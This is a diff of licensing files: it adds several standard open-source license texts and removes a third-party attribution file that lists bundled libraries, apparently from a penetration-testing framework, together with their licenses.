+ This package is an SSL implementation written
+ by Eric Young (eay@cryptsoft.com).
+ The implementation was written so as to conform with Netscapes SSL.
+ .
+ This library is free for commercial and non-commercial use as long as
+ the following conditions are aheared to.  The following conditions
+ apply to all code found in this distribution, be it the RC4, RSA,
+ lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ included with this distribution is covered by the same copyright terms
+ except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ .
+ Copyright remains Eric Young's, and as such any Copyright notices in
+ the code are not to be removed.
+ If this package is used in a product, Eric Young should be given attribution
+ as the author of the parts of the library used.
+ This can be in the form of a textual message at program startup or
+ in documentation (online or textual) provided with the package.
+ .
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions
+ are met:
+ 1. Redistributions of source code must retain the copyright
+    notice, this list of conditions and the following disclaimer.
+ 2. Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in the
+    documentation and/or other materials provided with the distribution.
+ 3. All advertising materials mentioning features or use of this software
+    must display the following acknowledgement:
+    "This product includes cryptographic software written by
+    Eric Young (eay@cryptsoft.com)"
+    The word 'cryptographic' can be left out if the rouines from the library
+    being used are not cryptographic related :-).
+ 4. If you include any Windows specific code (or a derivative thereof) from
+    the apps directory (application code) you must include an acknowledgement:
+    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ .
+ THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND
+ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ SUCH DAMAGE.
+ .
+ The licence and distribution terms for any publically available version or
+ derivative of this code cannot be changed.  i.e. this code cannot simply be
+ copied and put under another distribution licence
+ [including the GNU Public Licence.]
+
+License: MIT
+ Permission is hereby granted, free of charge, to any person obtaining
+ a copy of this software and associated documentation files (the
+ "Software"), to deal in the Software without restriction, including
+ without limitation the rights to use, copy, modify, merge, publish,
+ distribute, sublicense, and/or sell copies of the Software, and to
+ permit persons to whom the Software is furnished to do so, subject to
+ the following conditions:
+ .
+ The above copyright notice and this permission notice shall be
+ included in all copies or substantial portions of the Software.
+ .
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+ EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+ MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+ NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+ LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+ OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+License: Artistic
+ Copyright (c) 2000-2006, The Perl Foundation.
+ .
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+ .
+ Preamble
+ .
+ This license establishes the terms under which a given free software
+ Package may be copied, modified, distributed, and/or redistributed.
+ The intent is that the Copyright Holder maintains some artistic
+ control over the development of that Package while still keeping the
+ Package available as open source and free software.
+ .
+ You are always permitted to make arrangements wholly outside of this
+ license directly with the Copyright Holder of a given Package. If the
+ terms of this license do not permit the full use that you propose to
+ make of the Package, you should contact the Copyright Holder and seek
+ a different licensing arrangement.
+ .
+ Definitions
+ .
+ "Copyright Holder" means the individual(s) or organization(s)
+ named in the copyright notice for the entire Package.
+ .
+ "Contributor" means any party that has contributed code or other
+ material to the Package, in accordance with the Copyright Holder's
+ procedures.
+ .
+ "You" and "your" means any person who would like to copy,
+ distribute, or modify the Package.
+ .
+ "Package" means the collection of files distributed by the
+ Copyright Holder, and derivatives of that collection and/or of
+ those files. A given Package may consist of either the Standard
+ Version, or a Modified Version.
+ .
+ "Distribute" means providing a copy of the Package or making it
+ accessible to anyone else, or in the case of a company or
+ organization, to others outside of your company or organization.
+ .
+ "Distributor Fee" means any fee that you charge for Distributing
+ this Package or providing support for this Package to another
+ party. It does not mean licensing fees.
+ .
+ "Standard Version" refers to the Package if it has not been
+ modified, or has been modified only in ways explicitly requested
+ by the Copyright Holder.
+ .
+ "Modified Version" means the Package, if it has been changed, and
+ such changes were not explicitly requested by the Copyright
+ Holder.
+ .
+ "Original License" means this Artistic License as Distributed with
+ the Standard Version of the Package, in its current version or as
+ it may be modified by The Perl Foundation in the future.
+ .
+ "Source" form means the source code, documentation source, and
+ configuration files for the Package.
+ .
+ "Compiled" form means the compiled bytecode, object code, binary,
+ or any other form resulting from mechanical transformation or
+ translation of the Source form.
+ .
+ Permission for Use and Modification Without Distribution
+ .
+ (1) You are permitted to use the Standard Version and create and use
+ Modified Versions for any purpose without restriction, provided that
+ you do not Distribute the Modified Version.
+ .
+ .
+ Permissions for Redistribution of the Standard Version
+ .
+ (2) You may Distribute verbatim copies of the Source form of the
+ Standard Version of this Package in any medium without restriction,
+ either gratis or for a Distributor Fee, provided that you duplicate
+ all of the original copyright notices and associated disclaimers. At
+ your discretion, such verbatim copies may or may not include a
+ Compiled form of the Package.
+ .
+ (3) You may apply any bug fixes, portability changes, and other
+ modifications made available from the Copyright Holder. The resulting
+ Package will still be considered the Standard Version, and as such
+ will be subject to the Original License.
+ .
+ .
+ Distribution of Modified Versions of the Package as Source
+ .
+ (4) You may Distribute your Modified Version as Source (either gratis
+ or for a Distributor Fee, and with or without a Compiled form of the
+ Modified Version) provided that you clearly document how it differs
+ from the Standard Version, including, but not limited to, documenting
+ any non-standard features, executables, or modules, and provided that
+ you do at least ONE of the following:
+ .
+ (a) make the Modified Version available to the Copyright Holder
+ of the Standard Version, under the Original License, so that the
+ Copyright Holder may include your modifications in the Standard
+ Version.
+ .
+ (b) ensure that installation of your Modified Version does not
+ prevent the user installing or running the Standard Version. In
+ addition, the Modified Version must bear a name that is different
+ from the name of the Standard Version.
+ .
+ (c) allow anyone who receives a copy of the Modified Version to
+ make the Source form of the Modified Version available to others
+ under
+ .
+ (i) the Original License or
+ .
+ (ii) a license that permits the licensee to freely copy,
+ modify and redistribute the Modified Version using the same
+ licensing terms that apply to the copy that the licensee
+ received, and requires that the Source form of the Modified
+ Version, and of any works derived from it, be made freely
+ available in that license fees are prohibited but Distributor
+ Fees are allowed.
+ .
+ .
+ Distribution of Compiled Forms of the Standard Version
+ or Modified Versions without the Source
+ .
+ (5) You may Distribute Compiled forms of the Standard Version without
+ the Source, provided that you include complete instructions on how to
+ get the Source of the Standard Version. Such instructions must be
+ valid at the time of your distribution. If these instructions, at any
+ time while you are carrying out such distribution, become invalid, you
+ must provide new instructions on demand or cease further distribution.
+ If you provide valid instructions or cease distribution within thirty
+ days after you become aware that the instructions are invalid, then
+ you do not forfeit any of your rights under this license.
+ .
+ (6) You may Distribute a Modified Version in Compiled form without
+ the Source, provided that you comply with Section 4 with respect to
+ the Source of the Modified Version.
+ .
+ .
+ Aggregating or Linking the Package
+ .
+ (7) You may aggregate the Package (either the Standard Version or
+ Modified Version) with other packages and Distribute the resulting
+ aggregation provided that you do not charge a licensing fee for the
+ Package. Distributor Fees are permitted, and licensing fees for other
+ components in the aggregation are permitted. The terms of this license
+ apply to the use and Distribution of the Standard or Modified Versions
+ as included in the aggregation.
+ .
+ (8) You are permitted to link Modified and Standard Versions with
+ other works, to embed the Package in a larger work of your own, or to
+ build stand-alone binary or bytecode versions of applications that
+ include the Package, and Distribute the result without restriction,
+ provided the result does not expose a direct interface to the Package.
+ .
+ .
+ Items That are Not Considered Part of a Modified Version
+ .
+ (9) Works (including, but not limited to, modules and scripts) that
+ merely extend or make use of the Package, do not, by themselves, cause
+ the Package to be a Modified Version. In addition, such works are not
+ considered parts of the Package itself, and are not subject to the
+ terms of this license.
+ .
+ .
+ General Provisions
+ .
+ (10) Any use, modification, and distribution of the Standard or
+ Modified Versions is governed by this Artistic License. By using,
+ modifying or distributing the Package, you accept this license. Do not
+ use, modify, or distribute the Package, if you do not accept this
+ license.
+ .
+ (11) If your Modified Version has been derived from a Modified
+ Version made by someone other than you, you are nevertheless required
+ to ensure that your Modified Version complies with the requirements of
+ this license.
+ .
+ (12) This license does not grant you the right to use any trademark,
+ service mark, tradename, or logo of the Copyright Holder.
+ .
+ (13) This license includes the non-exclusive, worldwide,
+ free-of-charge patent license to make, have made, use, offer to sell,
+ sell, import and otherwise transfer the Package with respect to any
+ patent claims licensable by the Copyright Holder that are necessarily
+ infringed by the Package. If you institute patent litigation
+ (including a cross-claim or counterclaim) against any party alleging
+ that the Package constitutes direct or contributory patent
+ infringement, then this Artistic License to you shall terminate on the
+ date that such litigation is filed.
+ .
+ (14) Disclaimer of Warranty:
+ THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS "AS
+ IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED
+ WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
+ NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL
+ LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL
+ BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
+ DAMAGES ARISING IN ANY WAY OUT OF THE USE OF THE PACKAGE, EVEN IF
+ ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+License: Apache
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+ .
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+ .
+ 1. Definitions.
+ .
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+ .
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+ .
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+ .
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+ .
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+ .
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+ .
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+ .
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+ .
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+ .
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+ .
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+ .
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+ .
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+ .
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+ .
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+ .
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+ .
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+ .
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+ .
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+ .
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+ .
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+ .
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+ .
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+ .
+ END OF TERMS AND CONDITIONS
+ .
+ APPENDIX: How to apply the Apache License to your work.
+ .
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+ .
+ Copyright [yyyy] [name of copyright owner]
+ .
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+ .
+ http://www.apache.org/licenses/LICENSE-2.0
+ .
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+
+License: Zlib
+ This software is provided 'as-is', without any express or implied
+ warranty.  In no event will the authors be held liable for any damages
+ arising from the use of this software.
+ .
+ Permission is granted to anyone to use this software for any purpose,
+ including commercial applications, and to alter it and redistribute it
+ freely, subject to the following restrictions:
+ .
+ 1. The origin of this software must not be misrepresented; you must not
+    claim that you wrote the original software. If you use this software
+    in a product, an acknowledgment in the product documentation would be
+    appreciated but is not required.
+ 2. Altered source versions must be plainly marked as such, and must not be
+    misrepresented as being the original software.
+ 3. This notice may not be removed or altered from any source distribution.

THIRD-PARTY.md

@@ -1,1083 +0,0 @@
-
-
-This file lists bundled packages and their associated licensing terms.
-
-
- - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
-   Sniffer extension. HD Moore has a single-seat developer license.
- - The Rabal library located under lib/rabal
-
-
-
-
-Ruby
-====
- - The Bit-Struct library located under lib/bit-struct.
-   Copyright (c) 2005-2009, Joel VanderWerf.
- - The SNMP library located under lib/snmp.
-   Copyright (c) 2004 David R. Halliday
- - The Zip library located under lib/zip.
-   Copyright (C) 2002-2004 Thomas Sondergaard
- - Gem components located under lib/gemcache/
-   * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
-   Portions (c) 2007-2011 Eric Hodel.  Portions copyright others, see individual
-   files for details.
-   * eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
-   * json - Copyright Daniel Luz <dev at mernen dot com>
-   * pg - Copyright (c) 1997-2012 by the authors
-
-
-
-````
-  1. You may make and give away verbatim copies of the source form of the
-     software without restriction, provided that you duplicate all of the
-     original copyright notices and associated disclaimers.
-
-  2. You may modify your copy of the software in any way, provided that
-     you do at least ONE of the following:
-
-       a) place your modifications in the Public Domain or otherwise
-          make them Freely Available, such as by posting said
-    modifications to Usenet or an equivalent medium, or by allowing
-    the author to include your modifications in the software.
-
-       b) use the modified software only within your corporation or
-          organization.
-
-       c) rename any non-standard executables so the names do not conflict
-    with standard executables, which must also be provided.
-
-       d) make other distribution arrangements with the author.
-
-  3. You may distribute the software in object code or executable
-     form, provided that you do at least ONE of the following:
-
-       a) distribute the executables and library files of the software,
-    together with instructions (in the manual page or equivalent)
-    on where to get the original distribution.
-
-       b) accompany the distribution with the machine-readable source of
-    the software.
-
-       c) give non-standard executables non-standard names, with
-          instructions on where to get the original software distribution.
-
-       d) make other distribution arrangements with the author.
-
-  4. You may modify and include the part of the software into any other
-     software (possibly commercial).  But some files in the distribution
-     are not written by the author, so that they are not under this terms.
-
-     They are gc.c(partly), utils.c(partly), regex.[ch], st.[ch] and some
-     files under the ./missing directory.  See each file for the copying
-     condition.
-
-  5. The scripts and library files supplied as input to or produced as 
-     output from the software do not automatically fall under the
-     copyright of the software, but belong to whomever generated them, 
-     and may be sold commercially, and may be aggregated with this
-     software.
-
-  6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR
-     IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
-     WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-     PURPOSE.
-
-````
-
-
-PacketFu
-========
- - The PacketFu library located under lib/packetfu.
-   Copyright (c) 2008-2012, Tod Beardsley
-
-````
-Copyright (c) 2008-2012, Tod Beardsley
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright
-      notice, this list of conditions and the following disclaimer.
-    * Redistributions in binary form must reproduce the above copyright
-      notice, this list of conditions and the following disclaimer in the
-      documentation and/or other materials provided with the distribution.
-    * Neither the name of Tod Beardsley nor the
-      names of its contributors may be used to endorse or promote products
-      derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
-EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
-DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
-ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-````
-
-
-
-GPL
-===
- - The modified TightVNC binaries and their associated source code.
-
-````
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
